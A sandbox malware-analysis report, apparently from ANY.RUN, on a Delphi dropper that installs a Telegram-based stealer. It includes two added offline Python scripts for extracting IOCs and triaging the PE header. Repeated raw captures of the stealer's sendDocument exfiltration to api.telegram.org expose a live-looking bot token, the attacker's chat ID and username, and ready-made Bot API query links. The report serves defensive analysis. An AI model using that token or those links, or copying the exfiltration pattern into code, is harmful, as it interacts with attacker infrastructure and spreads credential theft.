File name:

order_scandoc.pif.exe

Full analysis: https://app.any.run/tasks/340f7eef-aa9d-464a-9a14-64393c243066
Verdict: Malicious activity
Threats:

Stealer

Stealers are a class of malware built to gain unauthorized access to a victim's data and send it to the attacker. The category covers programs that each target a particular kind of data, such as files, saved passwords, or cryptocurrency wallets. Many stealers also spy on the victim by logging keystrokes and taking screenshots. Stealers are distributed mainly through phishing campaigns.

Analysis date: September 23, 2025, 16:26:25
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
stealer
evasion
delphi
telegram
ims-api
generic
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 9 sections
MD5:

F0F00EBA3EF4C38CB7B77E20C4DA7D56

SHA1:

FA817BFCAFCC8B3633AFA3FB226F3345A160656D

SHA256:

F13039143D51037059A436504EAD9C3100CB9E500F02CC7E43055C93C0ED9597

SSDEEP:

49152:QMi9iqlK0i2/ygG6p5nx7RVGpL5WDrhMnciJ7UyCPw3mG893je3oRe/rb9xGpqL3:a9TDu6y5WDrhkciZUhPwWR3je3VDbX0l

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • order_scandoc.pif.exe (PID: 6264)
    • Reads security settings of Internet Explorer

      • order_scandoc.pif.exe (PID: 6264)
      • ykwhenrvO.exe (PID: 2064)
    • Checks for external IP

      • ykwhenrvO.exe (PID: 2064)
    • Process communicates with Telegram (possibly using it as an attacker's C2 server)

      • ykwhenrvO.exe (PID: 2064)
    • Possible usage of Discord/Telegram API has been detected (YARA)

      • ykwhenrvO.exe (PID: 2064)
  • INFO

    • Checks supported languages

      • order_scandoc.pif.exe (PID: 6264)
      • ykwhenrvO.exe (PID: 2064)
    • Checks proxy server information

      • order_scandoc.pif.exe (PID: 6264)
      • ykwhenrvO.exe (PID: 2064)
      • slui.exe (PID: 1236)
    • Reads the computer name

      • order_scandoc.pif.exe (PID: 6264)
      • ykwhenrvO.exe (PID: 2064)
    • The sample compiled with english language support

      • order_scandoc.pif.exe (PID: 6264)
    • Compiled with Borland Delphi (YARA)

      • order_scandoc.pif.exe (PID: 6264)
    • Reads the machine GUID from the registry

      • ykwhenrvO.exe (PID: 2064)
    • Creates files or folders in the user directory

      • ykwhenrvO.exe (PID: 2064)
    • Reads the software policy settings

      • ykwhenrvO.exe (PID: 2064)
      • slui.exe (PID: 1236)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

ims-api

(PID) Process(2064) ykwhenrvO.exe

Telegram-Tokens (1)
  8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI

Telegram-Info-Links
  Get info about bot: https://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getMe
  Get incoming updates: https://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getUpdates
  Get webhook: https://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getWebhookInfo
  Delete webhook: https://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook
  Drop incoming updates: https://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook?drop_pending_updates=true

Telegram-Requests (all to end-point sendDocument with the token above; the report lists the same uploads in several partial captures, shown here once per distinct capture)
  Token: 8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
  End-Point: sendDocument
  Args:
    chat_id (1): 6683518699
    caption (1): PW_DESKTOP-JGLLJLD\admin\176.128.145.138

  Token: 8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
  End-Point: sendDocument
  Args:
    chat_id (1): 6683518699
    caption (1): PW_DESKTOP-JGLLJLD\admin\176.128.145.138 HTTP/1.1

  Token: 8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
  End-Point: sendDocument
  Args:
    chat_id (1): 6683518699

  Token: 8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
  End-Point: sendDocument
  Args: (empty in the report)

  Token: 8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
  End-Point: sendDocument
  Args:
    chat_id (1): 6683518699
    caption (1): PW_DESKTOP-JGLLJLD\admi

  Token: 8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
  End-Point: sendDocu
  Args: (empty in the report)

Telegram-Responses (two distinct responses; both are uploads of the same file name to the same chat)
  ok: true
  result:
    message_id: 70
    from:
      id: 8465292288
      is_bot: true
      first_name: yaking001
      username: yaking001_bot
    chat:
      id: 6683518699
      first_name: Pascal
      last_name: John
      username: Pascaledums
      type: private
    date: 1758644806
    document:
      file_name: DESKTOP-JGLLJLD-admin.html
      mime_type: application/octet-stream
      file_id: BQACAgQAAxkDAANGaNLKRovKk5Yqrbbgq5yEr-Og5mQAAiUYAAJ-EphSuAFlTWqOkZo2BA
      file_unique_id: AgADJRgAAn4SmFI
      file_size: 136
    caption: PW_DESKTOP-JGLLJLD\admin\176.128.145.138
    caption_entities:
      offset: 25
      length: 15
      type: url

  ok: true
  result:
    message_id: 71
    from:
      id: 8465292288
      is_bot: true
      first_name: yaking001
      username: yaking001_bot
    chat:
      id: 6683518699
      first_name: Pascal
      last_name: John
      username: Pascaledums
      type: private
    date: 1758644810
    document:
      file_name: DESKTOP-JGLLJLD-admin.html
      mime_type: application/octet-stream
      file_id: BQACAgQAAxkDAANHaNLKSsh54d3cGbcGdm5I_rb5n98AAiYYAAJ-EphSRWWUz4l4L7o2BA
      file_unique_id: AgADJhgAAn4SmFI
      file_size: 136
    caption: PW_DESKTOP-JGLLJLD\admin\176.128.145.138
    caption_entities:
      offset: 25
      length: 15
      type: url
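The ims-api section above is the raw capture of the stealer's exfiltration: a multipart POST to api.telegram.org/bot<token>/sendDocument with chat_id, a caption of the form PW_<hostname>\<user>\<public IP>, and the stolen report as the document. The script below is an added example, not part of the ANY.RUN report and not the sample's own code. It parses one such request and its JSON response with the standard library only and joins them into an IOC record. The request and response it parses are constructed from the values in the section above (the multipart boundary and the document body are placeholders the report does not contain); names such as parse_request, split_caption, info_links and build_iocs are this example's own. It runs offline and never contacts Telegram.

```python
"""Turn Telegram Bot API traffic captured in a sandbox into IOCs.

Added example; not part of the ANY.RUN report or of the sample. The request and
response are constructed from the values in the ims-api section above, so the
script runs offline and never contacts api.telegram.org.
"""
import ipaddress
import json
import re

# Token shape seen in the report: <numeric bot id>:<35-char secret over [A-Za-z0-9_-]>.
TOKEN = r"\d{8,12}:[A-Za-z0-9_-]{35}"
REQUEST_LINE_RE = re.compile(rf"^(POST|GET)\s+/bot({TOKEN})/(\w+)")

SAMPLE_TOKEN = "8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI"  # token from the report
BOUNDARY = "----ConstructedBoundary"  # constructed; the real boundary is not in the report

# Constructed multipart sendDocument request carrying the report's chat_id, caption and file name.
SAMPLE_REQUEST = "\n".join([
    f"POST /bot{SAMPLE_TOKEN}/sendDocument HTTP/1.1",
    "Host: api.telegram.org",
    f"Content-Type: multipart/form-data; boundary={BOUNDARY}",
    "",
    f"--{BOUNDARY}", 'Content-Disposition: form-data; name="chat_id"', "", "6683518699",
    f"--{BOUNDARY}", 'Content-Disposition: form-data; name="caption"', "",
    "PW_DESKTOP-JGLLJLD\\admin\\176.128.145.138",
    f"--{BOUNDARY}", 'Content-Disposition: form-data; name="document"; filename="DESKTOP-JGLLJLD-admin.html"',
    "Content-Type: application/octet-stream", "",
    "<html><body>constructed placeholder for the stolen data</body></html>",
    f"--{BOUNDARY}--",
])

# Constructed JSON body rebuilt from the message_id 71 response in the report.
SAMPLE_RESPONSE = json.dumps({"ok": True, "result": {
    "message_id": 71, "date": 1758644810,
    "from": {"id": 8465292288, "is_bot": True, "first_name": "yaking001", "username": "yaking001_bot"},
    "chat": {"id": 6683518699, "first_name": "Pascal", "last_name": "John", "username": "Pascaledums", "type": "private"},
    "document": {"file_name": "DESKTOP-JGLLJLD-admin.html", "mime_type": "application/octet-stream",
                 "file_id": "BQACAgQAAxkDAANHaNLKSsh54d3cGbcGdm5I_rb5n98AAiYYAAJ-EphSRWWUz4l4L7o2BA",
                 "file_unique_id": "AgADJhgAAn4SmFI", "file_size": 136},
    "caption": "PW_DESKTOP-JGLLJLD\\admin\\176.128.145.138",
    "caption_entities": [{"offset": 25, "length": 15, "type": "url"}],
}})

def parse_multipart(body: str, boundary: str) -> dict:
    """Form fields by name; file parts become {'filename', 'size'} rather than their content."""
    fields = {}
    for part in body.split("--" + boundary):
        part = part.strip()
        if not part or part == "--":  # preamble or closing delimiter
            continue
        head, _, value = part.partition("\n\n")
        name = re.search(r'name="([^"]+)"', head)
        filename = re.search(r'filename="([^"]*)"', head)
        if name:
            fields[name.group(1)] = {"filename": filename.group(1), "size": len(value)} if filename else value
    return fields

def parse_request(raw: str) -> dict:
    """Token, end-point and form arguments of one captured Bot API request."""
    head, _, body = raw.partition("\n\n")
    m = REQUEST_LINE_RE.match(head)
    if not m:
        raise ValueError("not a Telegram Bot API request")
    boundary = re.search(r"boundary=(\S+)", head)
    args = parse_multipart(body, boundary.group(1)) if boundary else {}
    return {"method": m.group(1), "token": m.group(2), "endpoint": m.group(3), "args": args}

def parse_response(raw_json: str) -> dict:
    """Operator-side identifiers from a sendDocument response; entities are sliced as Telegram did."""
    r = json.loads(raw_json)
    if not r.get("ok"):
        return {"ok": False, "error": r.get("description")}
    msg, doc = r["result"], r["result"].get("document", {})
    caption = msg.get("caption", "")
    entities = [caption[e["offset"]:e["offset"] + e["length"]] for e in msg.get("caption_entities", [])]
    return {"ok": True, "message_id": msg["message_id"], "bot_username": msg["from"].get("username"),
            "chat_id": msg["chat"]["id"], "operator_username": msg["chat"].get("username"),
            "file_name": doc.get("file_name"), "file_size": doc.get("file_size"),
            "caption": caption, "entities": entities}

def split_caption(caption: str) -> dict:
    """Decode the <tag>_<hostname>\\<user>\\<public ip> caption layout seen in the report."""
    tag_host, user, ip = caption.split("\\")
    tag, host = tag_host.split("_", 1)
    return {"tag": tag, "hostname": host, "username": user, "public_ip": str(ipaddress.ip_address(ip))}

def info_links(token: str) -> dict:
    """The five Bot API queries the report derives from a recovered token."""
    base = f"https://api.telegram.org/bot{token}/"
    links = {m: base + m for m in ("getMe", "getUpdates", "getWebhookInfo", "deleteWebhook")}
    links["dropPendingUpdates"] = base + "deleteWebhook?drop_pending_updates=true"
    return links

def build_iocs(raw_request: str, raw_response: str) -> dict:
    """Join request and response into one IOC record for the case file."""
    req, resp = parse_request(raw_request), parse_response(raw_response)
    return {"bot_token": req["token"], "bot_id": int(req["token"].split(":")[0]),
            "chat_id": int(req["args"]["chat_id"]), "operator_username": resp["operator_username"],
            "exfil_file": req["args"]["document"]["filename"], "victim": split_caption(req["args"]["caption"]),
            "queries": info_links(req["token"])}
```

Call build_iocs(SAMPLE_REQUEST, SAMPLE_RESPONSE) to get the record for the capture above; on a real PCAP, feed it each reassembled request/response pair. The caption_entities block in the response (offset 25, length 15, type url) is Telegram's own parser recognising the victim's public IP at the end of the caption, which is why parse_response slices it back out. Treat the recovered token as both an IOC and a live credential: the getMe/getUpdates/getWebhookInfo links only work while the operator has not revoked it, getUpdates returns an error when a webhook is set (check getWebhookInfo first), and any request with the attacker's token is an interaction with attacker infrastructure that can tip them off, so get authorization before pivoting on it.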
No Malware configuration.

TRiD

.scr | Windows screen saver (43.2)
.dll | Win32 Dynamic Link Library (generic) (21.7)
.exe | Win32 Executable (generic) (14.8)
.exe | Win16/32 Executable Delphi generic (6.8)
.exe | Generic Win/DOS Executable (6.6)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 1992:06:19 22:22:17+00:00
ImageFileCharacteristics: Executable, No line numbers, No symbols, Bytes reversed lo, 32-bit, Bytes reversed hi
PEType: PE32
LinkerVersion: 2.25
CodeSize: 515072
InitializedDataSize: 1141248
UninitializedDataSize: -
EntryPoint: 0x7f7bc
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI
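The EXIF block above carries the two values that identify a classic Delphi build and corroborate the "Compiled with Borland Delphi" YARA hit: the TimeDateStamp 1992:06:19 22:22:17 (the constant 0x2A425E19 that those Delphi linkers write instead of a real build time) and LinkerVersion 2.25. The script below is an added example, not from the ANY.RUN report and not the sample's code. It parses a PE32 header with the standard library only, decodes the same fields the report shows, and flags the Delphi fingerprint. The header it parses is constructed in build_sample_pe() from the report's EXIF values and contains no bytes of the real file; triage and build_sample_pe are this example's own names.

```python
"""Static triage of the PE header fields the EXIF block above reports.

Added example; not part of the ANY.RUN report. Parses a PE32 header with the
standard library only and flags the Delphi fingerprint: the fixed TimeDateStamp
0x2A425E19 (1992-06-19 22:22:17 UTC) together with linker version 2.25.
"""
import struct
from datetime import datetime, timezone

DELPHI_STAMP = 0x2A425E19   # constant stamp written by classic Delphi linkers; not a real build time
COFF_FMT = "<HHIIIHH"       # Machine, NumberOfSections, TimeDateStamp, SymTab, NumSyms, OptSize, Characteristics
OPT32_FMT = "<HBBIIIIIIIIIHHHHHHIIIIHH"  # PE32 optional header up to DllCharacteristics (72 bytes)
CHARACTERISTICS = {0x0002: "EXECUTABLE_IMAGE", 0x0004: "LINE_NUMS_STRIPPED", 0x0008: "LOCAL_SYMS_STRIPPED",
                   0x0080: "BYTES_REVERSED_LO", 0x0100: "32BIT_MACHINE", 0x2000: "DLL",
                   0x8000: "BYTES_REVERSED_HI"}
SUBSYSTEMS = {2: "Windows GUI", 3: "Windows CUI"}


def build_sample_pe() -> bytes:
    """Constructed minimal PE32 image whose header fields match the report's EXIF values."""
    dos = bytearray(b"MZ" + bytes(62))
    struct.pack_into("<I", dos, 60, 0x80)                      # e_lfanew -> PE header at 0x80
    coff = struct.pack(COFF_FMT, 0x14C, 9, DELPHI_STAMP, 0, 0, 224, 0x818E)
    opt = struct.pack(OPT32_FMT, 0x10B, 2, 25, 515072, 1141248, 0, 0x7F7BC, 0x1000, 0x7F000,
                      0x400000, 0x1000, 0x200, 4, 0, 0, 0, 4, 0, 0, 0x1A0000, 0x400, 0, 2, 0)
    return bytes(dos) + bytes(0x80 - 64) + b"PE\0\0" + coff + opt + bytes(224 - len(opt))


def triage(data: bytes) -> dict:
    """Parse the headers and return the fields an analyst compares against a sandbox report."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 60)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    machine, nsections, stamp, _, _, _, chars = struct.unpack_from(COFF_FMT, data, e_lfanew + 4)
    opt = struct.unpack_from(OPT32_FMT, data, e_lfanew + 24)
    magic, lmaj, lmin, code_size, init_size, uninit_size, entry = opt[:7]
    if magic != 0x10B:
        raise ValueError("not a PE32 (32-bit) optional header")
    return {
        "machine": hex(machine),
        "sections": nsections,
        "timestamp": datetime.fromtimestamp(stamp, tz=timezone.utc).strftime("%Y:%m:%d %H:%M:%S"),
        "linker": f"{lmaj}.{lmin}",
        "code_size": code_size,
        "init_data_size": init_size,
        "uninit_data_size": uninit_size,
        "entry_point": hex(entry),
        "os_version": opt[12],
        "subsystem_version": opt[16],
        "subsystem": SUBSYSTEMS.get(opt[22], str(opt[22])),
        "characteristics": [name for bit, name in CHARACTERISTICS.items() if chars & bit],
        # Both markers together is the Delphi fingerprint. Either can be forged, so treat a hit
        # as corroboration of the YARA result rather than proof on its own.
        "delphi_fingerprint": stamp == DELPHI_STAMP and (lmaj, lmin) == (2, 25),
    }


if __name__ == "__main__":
    for key, value in triage(build_sample_pe()).items():
        print(f"{key}: {value}")
```

Run it against the real dropper with triage(open(path, "rb").read()). Because the stamp is a constant, the compile time of a Delphi binary says nothing about when the dropper was actually built; for dating this campaign use the analysis date or the Telegram message date in the response (1758644810 is 2025-09-23 UTC, consistent with the analysis date) instead.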
No data.
screenshot
All screenshots are available in the full report
Total processes: 138
Monitored processes: 3
Malicious processes: 2
Suspicious processes: 0

Behavior graph

start order_scandoc.pif.exe ykwhenrvo.exe slui.exe

Process information

PID: 1236
CMD: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe (the -Embedding switch is COM activation; slui.exe is a Windows component, not a child of the sample)
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Activation Client
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (Images):
  c:\windows\system32\slui.exe
  c:\windows\system32\ntdll.dll
  c:\windows\system32\kernel32.dll
  c:\windows\system32\kernelbase.dll
  c:\windows\system32\advapi32.dll
  c:\windows\system32\msvcrt.dll
  c:\windows\system32\sechost.dll
  c:\windows\system32\rpcrt4.dll
  c:\windows\system32\bcrypt.dll
  c:\windows\system32\user32.dll

PID: 2064
CMD: C:\\Users\\Public\\ykwhenrvO.exe
Path: C:\Users\Public\ykwhenrvO.exe
Parent process: order_scandoc.pif.exe
User: admin
Company: David Harris
Integrity Level: MEDIUM
Description: Mercury/32 Loader Module v4.62
Version: 4.62
Modules (Images):
  c:\users\public\ykwhenrvo.exe
  c:\windows\system32\ntdll.dll
  c:\windows\syswow64\ntdll.dll
  c:\windows\system32\wow64.dll
  c:\windows\system32\wow64win.dll
  c:\windows\system32\wow64cpu.dll
  c:\windows\syswow64\kernel32.dll
  c:\windows\syswow64\kernelbase.dll
  c:\windows\syswow64\apphelp.dll
  c:\windows\syswow64\msvbvm60.dll
ims-api: see the ims-api section above (same Telegram token, requests and responses for PID 2064)
ims-api
(PID) Process(2064) ykwhenrvO.exe
Telegram-Responses
oktrue
result
message_id71
from
id8465292288
is_bottrue
first_nameyaking001
usernameyaking001_bot
chat
id6683518699
first_namePascal
last_nameJohn
usernamePascaledums
typeprivate
date1758644810
document
file_nameDESKTOP-JGLLJLD-admin.html
mime_typeapplication/octet-stream
file_idBQACAgQAAxkDAANHaNLKSsh54d3cGbcGdm5I_rb5n98AAiYYAAJ-EphSRWWUz4l4L7o2BA
file_unique_idAgADJhgAAn4SmFI
file_size136
captionPW_DESKTOP-JGLLJLD\admin\176.128.145.138
caption_entities
offset25
length15
typeurl
(PID) Process(2064) ykwhenrvO.exe
Telegram-Tokens (1)8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Telegram-Info-Links
8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Get info about bothttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getMe
Get incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getUpdates
Get webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
caption (1)PW_DESKTOP-JGLLJLD\admin\176.128.145.138
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
Telegram-Responses
oktrue
result
message_id71
from
id8465292288
is_bottrue
first_nameyaking001
usernameyaking001_bot
chat
id6683518699
first_namePascal
last_nameJohn
usernamePascaledums
typeprivate
date1758644810
document
file_nameDESKTOP-JGLLJLD-admin.html
mime_typeapplication/octet-stream
file_idBQACAgQAAxkDAANHaNLKSsh54d3cGbcGdm5I_rb5n98AAiYYAAJ-EphSRWWUz4l4L7o2BA
file_unique_idAgADJhgAAn4SmFI
file_size136
captionPW_DESKTOP-JGLLJLD\admin\176.128.145.138
caption_entities
offset25
length15
typeurl
(PID) Process(2064) ykwhenrvO.exe
Telegram-Tokens (1)8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Telegram-Info-Links
8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Get info about bothttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getMe
Get incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getUpdates
Get webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
caption (1)PW_DESKTOP-JGLLJLD\admin\176.128.145.138
Telegram-Responses
oktrue
result
message_id71
from
id8465292288
is_bottrue
first_nameyaking001
usernameyaking001_bot
chat
id6683518699
first_namePascal
last_nameJohn
usernamePascaledums
typeprivate
date1758644810
document
file_nameDESKTOP-JGLLJLD-admin.html
mime_typeapplication/octet-stream
file_idBQACAgQAAxkDAANHaNLKSsh54d3cGbcGdm5I_rb5n98AAiYYAAJ-EphSRWWUz4l4L7o2BA
file_unique_idAgADJhgAAn4SmFI
file_size136
captionPW_DESKTOP-JGLLJLD\admin\176.128.145.138
caption_entities
offset25
length15
typeurl
(PID) Process(2064) ykwhenrvO.exe
Telegram-Tokens (1)8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Telegram-Info-Links
8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Get info about bothttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getMe
Get incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getUpdates
Get webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
caption (1)PW_DESKTOP-JGLLJLD\admin\176.128.145.138 HTTP/1.1
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
caption (1)PW_DESKTOP-JGLLJLD\admin\176.128.145.138
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocu
Args
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
caption (1)PW_DESKTOP-JGLLJLD\admi
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
caption (1)PW_DESKTOP-JGLLJLD\admin\176.128.145.138 HTTP/1.1
Telegram-Responses
oktrue
result
message_id71
from
id8465292288
is_bottrue
first_nameyaking001
usernameyaking001_bot
chat
id6683518699
first_namePascal
last_nameJohn
usernamePascaledums
typeprivate
date1758644810
document
file_nameDESKTOP-JGLLJLD-admin.html
mime_typeapplication/octet-stream
file_idBQACAgQAAxkDAANHaNLKSsh54d3cGbcGdm5I_rb5n98AAiYYAAJ-EphSRWWUz4l4L7o2BA
file_unique_idAgADJhgAAn4SmFI
file_size136
captionPW_DESKTOP-JGLLJLD\admin\176.128.145.138
caption_entities
offset25
length15
typeurl
(PID) Process(2064) ykwhenrvO.exe
Telegram-Tokens (1)8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Telegram-Info-Links
8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Get info about bothttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getMe
Get incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getUpdates
Get webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
caption (1)PW_DESKTOP-JGLLJLD\admi
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocu
Args
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
caption (1)PW_DESKTOP-JGLLJLD\admin\176.128.145.138 HTTP/1.1
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
caption (1)PW_DESKTOP-JGLLJLD\admin\176.128.145.138
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
caption (1)PW_DESKTOP-JGLLJLD\admin\176.128.145.138 HTTP/1.1
Telegram-Responses
oktrue
result
message_id71
from
id8465292288
is_bottrue
first_nameyaking001
usernameyaking001_bot
chat
id6683518699
first_namePascal
last_nameJohn
usernamePascaledums
typeprivate
date1758644810
document
file_nameDESKTOP-JGLLJLD-admin.html
mime_typeapplication/octet-stream
file_idBQACAgQAAxkDAANHaNLKSsh54d3cGbcGdm5I_rb5n98AAiYYAAJ-EphSRWWUz4l4L7o2BA
file_unique_idAgADJhgAAn4SmFI
file_size136
captionPW_DESKTOP-JGLLJLD\admin\176.128.145.138
caption_entities
offset25
length15
typeurl
(PID) Process(2064) ykwhenrvO.exe
Telegram-Tokens (1)8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Telegram-Info-Links
8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Get info about bothttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getMe
Get incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getUpdates
Get webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
caption (1)PW_DESKTOP-JGLLJLD\admin\176.128.145.138
Telegram-Responses
oktrue
result
message_id71
from
id8465292288
is_bottrue
first_nameyaking001
usernameyaking001_bot
chat
id6683518699
first_namePascal
last_nameJohn
usernamePascaledums
typeprivate
date1758644810
document
file_nameDESKTOP-JGLLJLD-admin.html
mime_typeapplication/octet-stream
file_idBQACAgQAAxkDAANHaNLKSsh54d3cGbcGdm5I_rb5n98AAiYYAAJ-EphSRWWUz4l4L7o2BA
file_unique_idAgADJhgAAn4SmFI
file_size136
captionPW_DESKTOP-JGLLJLD\admin\176.128.145.138
caption_entities
offset25
length15
typeurl
oktrue
result
message_id70
from
id8465292288
is_bottrue
first_nameyaking001
usernameyaking001_bot
chat
id6683518699
first_namePascal
last_nameJohn
usernamePascaledums
typeprivate
date1758644806
document
file_nameDESKTOP-JGLLJLD-admin.html
mime_typeapplication/octet-stream
file_idBQACAgQAAxkDAANGaNLKRovKk5Yqrbbgq5yEr-Og5mQAAiUYAAJ-EphSuAFlTWqOkZo2BA
